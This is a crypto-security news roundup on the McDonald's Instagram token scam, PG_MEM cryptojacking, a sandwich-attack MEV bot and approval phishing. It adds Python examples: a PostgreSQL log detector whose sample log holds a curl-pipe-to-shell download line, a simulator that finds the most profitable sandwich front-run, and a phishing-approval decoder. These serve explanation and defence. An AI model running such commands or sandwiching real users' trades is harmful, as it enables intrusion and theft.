McDonald’s Instagram Hacked, Scammers Steal $700,000 in Solana

Scammers stole $700K in Solana after hacking into the Instagram account of McDonald’s and promoting a fraudulent token named GRIMACE.

McDonald’s official Instagram account was hacked on Aug. 21. The hijacked account promoted a fraudulent meme coin named “Grimace,” and the scammers got away with roughly $700,000 worth of SOL. Meanwhile, new threats like the PG_MEM malware are targeting PostgreSQL-managed databases, while the notorious MEV bot “jaredfromsubway.eth” has resurfaced with upgraded capabilities.

Social Media Hack Results in $700,000 Solana Heist

On Aug. 21, the official Instagram account of McDonald’s was hacked, and the attackers stole more than $700,000 in Solana (SOL) by promoting a fraudulent meme coin named “Grimace.” The scammers used McDonald’s audience of close to 5.1 million Instagram followers to falsely advertise the token as a legitimate experiment by the fast food giant on the Solana blockchain.

Screenshots shared on X showed that the hackers posted several updates about the token and used McDonald’s purple mascot, Grimace, to lure investors. Blockchain analytics service Bubblemaps reported that the hackers first acquired 75% of the Grimace token’s circulating supply through Pump.fun, a Solana meme coin launchpad, and then spread those tokens across roughly 100 wallets, a common way to disguise a concentrated holding from anyone checking the token’s distribution.

DexScreener data showed that the fraudulent promotion pushed the Grimace token’s market cap from a few thousand dollars to $25 million in about 30 minutes. The surge was short-lived: the hackers dumped their holdings almost immediately.

After executing the scam, the hackers edited McDonald’s Instagram bio to brag about their success, claiming they had netted $700,000 in Solana from the rug pull. The posts and the altered bio were eventually removed, and McDonald’s regained control of the account.

Screenshot of McDonald’s hacked account (Source: X)

In response to the incident, McDonald’s issued a statement to the New York Post, and called the hack an “isolated incident” affecting its social media accounts. The company also assured people that the issue is resolved and apologized for any offensive content that was posted during the hack.

New Cryptojacking Threat

It is not just social media hacks pestering the crypto community. A new malware named PG_MEM has been discovered targeting PostgreSQL-managed databases to install cryptocurrency mining software. It threatens the more than 800,000 PostgreSQL databases worldwide, particularly internet-exposed instances protected by weak passwords.

The attack starts with a brute-force attempt to find a weak password, which gives the threat actor access to the database. Once inside, the attacker creates a new user with high privileges, downloads files from their server, and hardens the host so that other threat actors cannot exploit the same database.

The malware then connects to a mining pool and uses the database server’s computing resources to mine cryptocurrency, a practice known as cryptojacking. Concerningly, these attacks are becoming more common: crypto-malware attacks rose 400% in the first half of 2023 compared to the previous year.

PG_MEM attack flow (Source: Aqua)

PG_MEM is particularly concerning because it does not rely on a software bug at all. The weakness it exploits is weak passwords on internet-facing databases, the result of misconfigurations and inadequate identity controls, so patching PostgreSQL does not help; only strong authentication and limiting network exposure do. Many organizations inadvertently expose their databases to this risk by connecting them to the internet without enough security measures.
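One way to catch the chain described above (repeated login failures, then a successful login, a new superuser role, and an OS command run from the database) is to run a small detector over the PostgreSQL server log. The script below is an added example, not code from the article or from Aqua; the log lines are constructed, the server is assumed to run with log_line_prefix = '%m [%p] %u@%d %h ', log_connections = on and log_statement = 'all', and the five-failure threshold is arbitrary. COPY ... FROM PROGRAM is included because it is the standard way a PostgreSQL superuser runs a shell command, which is what turning a database foothold into a file download and a running miner requires.

```python
"""Spot the PG_MEM-style chain (credential brute force -> superuser role ->
OS command) in PostgreSQL server logs.

Added example; not code from the article or from Aqua's report. The log lines
are constructed. Assumed server settings: log_line_prefix = '%m [%p] %u@%d %h ',
log_connections = on, log_statement = 'all'. The failure threshold is arbitrary.
"""
import re
from collections import defaultdict

# One line of the assumed prefix: timestamp [pid] user@db client_host LEVEL:  message
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
# CREATE/ALTER ROLE|USER ... SUPERUSER: a new or upgraded superuser.
ROLE_RE = re.compile(r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*\bSUPERUSER\b", re.I)
# COPY ... FROM PROGRAM: a superuser running a shell command on the host.
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I)

# Constructed sample: six failures then success from 203.0.113.5, followed by a
# superuser role and a COPY FROM PROGRAM; one benign typo-and-retry from 10.0.0.8.
SAMPLE_LOG = """\
2024-08-21 10:00:01.101 UTC [5120] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-21 10:00:01.240 UTC [5121] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-21 10:00:01.388 UTC [5122] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-21 10:00:01.502 UTC [5123] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-21 10:00:01.650 UTC [5124] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-21 10:00:01.790 UTC [5125] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-21 10:00:02.015 UTC [5126] postgres@postgres 203.0.113.5 LOG:  connection authorized: user=postgres database=postgres
2024-08-21 10:00:02.300 UTC [5126] postgres@postgres 203.0.113.5 LOG:  statement: CREATE ROLE backup_admin WITH LOGIN SUPERUSER PASSWORD 'x'
2024-08-21 10:00:02.900 UTC [5126] postgres@postgres 203.0.113.5 LOG:  statement: COPY tmp FROM PROGRAM 'curl -s http://198.51.100.7/x | sh'
2024-08-21 10:05:00.000 UTC [5200] app@shop 10.0.0.8 FATAL:  password authentication failed for user "app"
2024-08-21 10:05:03.000 UTC [5201] app@shop 10.0.0.8 LOG:  connection authorized: user=app database=shop
"""


def parse(line):
    """Return the line's fields as a dict, or None if it does not match the prefix."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, fail_threshold=5):
    """Walk the log in order and return a list of alert dicts."""
    failures = defaultdict(int)  # consecutive auth failures per client host
    brute_forced = set()         # hosts that logged in after >= threshold failures
    alerts = []
    for raw in log_text.splitlines():
        ev = parse(raw)
        if ev is None:
            continue
        host, msg = ev["host"], ev["msg"]
        if ev["level"] == "FATAL" and "password authentication failed" in msg:
            failures[host] += 1
        elif msg.startswith("connection authorized:"):
            if failures[host] >= fail_threshold:
                brute_forced.add(host)
                alerts.append({"kind": "brute_force_success", "host": host, "ts": ev["ts"],
                               "severity": "high",
                               "detail": f"login as {ev['user']} after {failures[host]} failures"})
            failures[host] = 0  # a success ends the streak either way
        elif msg.startswith("statement:"):
            sql = msg.split(":", 1)[1].strip()
            # Post-exploitation steps are high severity from a brute-forced host,
            # medium otherwise (a legitimate DBA may do either, but rarely).
            severity = "high" if host in brute_forced else "medium"
            if ROLE_RE.search(sql):
                alerts.append({"kind": "superuser_role", "host": host, "ts": ev["ts"],
                               "severity": severity, "detail": sql[:80]})
            if COPY_PROGRAM_RE.search(sql):
                alerts.append({"kind": "os_command_via_copy", "host": host, "ts": ev["ts"],
                               "severity": severity, "detail": sql[:80]})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["severity"].upper(), a["kind"], a["host"], a["ts"], "-", a["detail"])
```

The same three signals can be fed to a SIEM directly, but the order matters: a superuser role created by a session that began with a burst of failed logins is a much stronger signal than either event alone, which is why the detector keeps per-host state across the log.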

While cryptojacking is mostly seen as a threat, some see potential in harnessing unused computing capacity for legitimate purposes. Companies like Aethir, which provides decentralized cloud infrastructure, aggregate unused GPU capacity from data centers to offer scalable and cost-effective computing services; the difference is that the capacity is contributed with its owner’s consent.

Revamped MEV Bot Targets DeFi Protocols

The infamous maximal extractable value (MEV) bot known as “jaredfromsubway.eth” has resurfaced with new capabilities that allow it to execute more complex “sandwich” attacks on decentralized finance (DeFi) protocols. The bot earned millions of dollars through arbitrage and sandwich attacks earlier in 2023 and has now been upgraded with new strategies that make it even more formidable.

On Aug. 20, MEV tracking site EigenPhi reported that a new MEV contract linked to the bot had emerged and was employing sophisticated multi-layered sandwich attacks. A sandwich attack places one transaction immediately before a victim’s pending swap and another immediately after it: the first moves the price against the victim, the victim’s own swap moves it further, and the second sells into the inflated price, extracting the difference at the victim’s expense. Over the past two weeks, the new contract has been seen using a number of advanced on-chain trade-squeezing methods.

The bot does not exploit a bug in the DeFi protocols themselves; it exploits transaction ordering. It watches for pending swaps, especially on Uniswap V3 pools, and executes its own transactions in the same block to manipulate the exchange rate the victim receives. The result is profit for the bot and losses for other users.

The upgraded bot is called “Jared 2.0,” and now adds and removes liquidity in the decentralized exchange (DEX) pool as part of its sandwich attacks. This tactic complicates analysis and tracking of its profitability.
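To make the sandwich arithmetic concrete, the following added example (not code from the article, EigenPhi, or the bot) models one on a constant-product pool using Uniswap V2 style math with a 0.3% fee; the Uniswap V3 concentrated-liquidity pools the article mentions change the price curve but not the front-run / victim / back-run structure. It also goes one step beyond the text: `max_frontrun` searches for the largest front-run that still leaves the victim’s swap inside its slippage tolerance, which is the “squeezing” the bot is doing. Pool reserves, the victim’s trade and the 1% tolerance are constructed.

```python
"""Sandwich-attack arithmetic on a constant-product (x*y = k) AMM pool.

Added example; not code from the article, EigenPhi, or the bot it describes.
Uniswap V2-style math with a 0.3% fee is used as a simplification of the
Uniswap V3 pools the article mentions. Reserves and trade sizes are constructed.
"""
FEE_BPS = 30  # 0.30% swap fee, charged on the input amount


def amount_out(amount_in, reserve_in, reserve_out, fee_bps=FEE_BPS):
    """Uniswap V2 getAmountOut: tokens received for amount_in, fee on input."""
    in_with_fee = amount_in * (10_000 - fee_bps)
    return in_with_fee * reserve_out // (reserve_in * 10_000 + in_with_fee)


class Pool:
    """Reserves of the token the victim sells (quote) and the one they buy (base)."""

    def __init__(self, quote, base):
        self.quote, self.base = quote, base

    def buy_base(self, quote_in):
        out = amount_out(quote_in, self.quote, self.base)
        self.quote += quote_in
        self.base -= out
        return out

    def sell_base(self, base_in):
        out = amount_out(base_in, self.base, self.quote)
        self.base += base_in
        self.quote -= out
        return out


def sandwich(reserve_quote, reserve_base, victim_in, victim_min_out, frontrun_in):
    """One block: attacker buys, victim buys, attacker sells back.

    Returns None when the victim's minOut check fails (their swap reverts and the
    attacker is left holding the front-run position), else the resulting numbers.
    """
    pool = Pool(reserve_quote, reserve_base)
    attacker_base = pool.buy_base(frontrun_in)      # front-run pushes the price up
    victim_base = pool.buy_base(victim_in)          # victim buys at the worse price
    if victim_base < victim_min_out:
        return None
    attacker_quote = pool.sell_base(attacker_base)  # back-run sells into the higher price
    return {"attacker_profit": attacker_quote - frontrun_in, "victim_got": victim_base}


def max_frontrun(reserve_quote, reserve_base, victim_in, victim_min_out):
    """Largest front-run that still leaves the victim at or above minOut.

    victim_got falls monotonically as the front-run grows, so a binary search
    finds the size that squeezes the victim to exactly their slippage limit.
    """
    lo, hi = 0, reserve_quote * 10
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if sandwich(reserve_quote, reserve_base, victim_in, victim_min_out, mid) is None:
            hi = mid - 1
        else:
            lo = mid
    return lo


if __name__ == "__main__":
    USDC, ETH = 10**6, 10**18                        # token base units
    r_quote, r_base = 1_000_000 * USDC, 500 * ETH    # constructed pool, ~2000 USDC per ETH
    victim_in = 10_000 * USDC
    honest = amount_out(victim_in, r_quote, r_base)  # what the victim gets unsandwiched
    min_out = honest * 99 // 100                     # victim set a 1% slippage tolerance
    f = max_frontrun(r_quote, r_base, victim_in, min_out)
    res = sandwich(r_quote, r_base, victim_in, min_out, f)
    print(f"front-run {f / USDC:.2f} USDC, attacker profit {res['attacker_profit'] / USDC:.2f} USDC")
    print(f"victim got {res['victim_got'] / ETH:.6f} ETH instead of {honest / ETH:.6f} ETH")
```

Two practical points fall out of the model: the attacker’s room to profit is exactly the victim’s slippage tolerance, so a tighter minOut shrinks `max_frontrun` to nothing, and the attack needs to see the victim’s transaction before it is mined, which is what private transaction relays take away.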

According to EigenPhi, the original jaredfromsubway contract address facilitated trading strategies that paid out close to $2.2 million to other bots or traders over a two-week period starting on Aug. 1. However, activity on this contract started declining on Aug. 7, and eventually dropped to zero on Aug. 14.

MEV attack volume (Source: EigenPhi)

Despite the reduced activity on the original contract, sandwich attack volume passed $17 billion in the past month alone.

Crypto Whale Loses $55M to Phishing Scam

Meanwhile, a crypto whale lost $55 million in stablecoins to a phishing attack on Aug. 20. The wallet owner unknowingly signed a malicious transaction that handed 55.47 million DAI held in the decentralized finance protocol Maker to a phishing address.

The whale realized the mistake and tried to withdraw the funds to a new address, but this did not work because ownership of the wallet’s stablecoins had already been transferred.

Blockchain analytics firm Lookonchain quickly flagged the incident, and revealed that the attackers exchanged 27.5 million DAI for 10,625 ETH after setting the wallet's ownership to a newly created address. 

Phishing attacks are a huge threat in the crypto space. They typically trick victims into signing malicious transactions or installing fake software, and the signature or the software then drains their digital assets.

These attacks have already caused heavy financial damage in 2024: on July 3, blockchain security firm CertiK reported that $498 million had been lost to phishing attacks in the first half of the year.

Some steps are being taken to fight these attacks. The Australian Federal Police (AFP) announced on Aug. 4 that it was investigating losses from phishing scams affecting 2,000 Australian-owned digital asset wallets.

This followed findings by analytics firm Chainalysis that the wallets had been targeted with “approval phishing,” in which the victim is tricked into signing a token approval that lets the attacker’s address spend the victim’s tokens. The Australian Securities and Investments Commission (ASIC), for its part, reported that it had taken down over 5,530 fake investment platforms, 1,065 phishing links, and 615 crypto investment scams since July 2023.
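What “signing a malicious transaction” means in practice is signing calldata the wallet UI did not explain. The added example below (not code from the article, Chainalysis, or any wallet) decodes the three standard token-approval calls that approval phishing relies on and flags an unlimited allowance or a blanket setApprovalForAll to an unknown spender. The four-byte selectors and the ABI word layout are real; the spender address and the calldata are constructed for the demo.

```python
"""Decode what an EVM wallet is being asked to sign and flag approval-phishing shapes.

Added example; not code from the article or from any wallet or firm it cites.
Only the ABI layout and the three selectors are real; the spender address and
calldata are constructed.
"""

# 4-byte selector = first 4 bytes of keccak256(signature). These are the
# standard ERC-20 (approve, increaseAllowance) and ERC-721/1155 (setApprovalForAll) ones.
SELECTORS = {
    "095ea7b3": ("approve", ("address", "uint256")),
    "39509351": ("increaseAllowance", ("address", "uint256")),
    "a22cb465": ("setApprovalForAll", ("address", "bool")),
}
UINT256_MAX = 2**256 - 1


def encode_call(selector_hex, *args):
    """ABI-encode static args as left-padded 32-byte words after the selector (demo helper)."""
    words = []
    for a in args:
        if isinstance(a, bool):            # check bool before int: True is an int
            words.append(int(a).to_bytes(32, "big"))
        elif isinstance(a, int):
            words.append(a.to_bytes(32, "big"))
        else:                              # 0x-prefixed 20-byte address
            words.append(bytes.fromhex(a[2:]).rjust(32, b"\0"))
    return "0x" + selector_hex + b"".join(words).hex()


def decode_call(calldata):
    """Return (function_name, [args]) for a known selector, else None."""
    raw = bytes.fromhex(calldata[2:] if calldata.startswith("0x") else calldata)
    sel = raw[:4].hex()
    if sel not in SELECTORS or len(raw) < 4 + 32 * len(SELECTORS[sel][1]):
        return None
    name, types = SELECTORS[sel]
    args = []
    for i, t in enumerate(types):
        word = raw[4 + 32 * i: 4 + 32 * (i + 1)]
        if t == "address":
            args.append("0x" + word[12:].hex())        # address is the low 20 bytes
        elif t == "bool":
            args.append(int.from_bytes(word, "big") != 0)
        else:
            args.append(int.from_bytes(word, "big"))
    return name, args


def assess(calldata, trusted_spenders=frozenset()):
    """Classify the risk of signing this calldata. trusted_spenders: lowercase addresses."""
    decoded = decode_call(calldata)
    if decoded is None:
        return {"function": None, "risk": "unknown selector; refuse to sign blind"}
    name, (spender, value) = decoded
    spender = spender.lower()
    result = {"function": name, "spender": spender, "value": value}
    if spender in trusted_spenders:
        result["risk"] = "none"
    elif name == "setApprovalForAll" and value:
        result["risk"] = "grants transfer rights over every token in the collection to an unknown address"
    elif name in ("approve", "increaseAllowance") and value >= 2**255:
        result["risk"] = "unlimited allowance to an unknown spender"
    elif name in ("approve", "increaseAllowance"):
        result["risk"] = "bounded allowance to an unknown spender; verify the contract first"
    else:
        result["risk"] = "none"  # setApprovalForAll(addr, false) is a revoke
    return result


if __name__ == "__main__":
    spender = "0x1111111111111111111111111111111111111111"   # constructed, not a real contract
    for cd in (encode_call("095ea7b3", spender, UINT256_MAX),
               encode_call("a22cb465", spender, True),
               encode_call("095ea7b3", spender, 500 * 10**18),
               "0xdeadbeef"):
        print(assess(cd))
```

A wallet or a pre-signing hook can run `assess` on the calldata before the user is asked to sign; a short allowlist of verified router and marketplace contracts keeps legitimate approvals quiet while anything granting open-ended spending rights to a fresh address gets a loud warning.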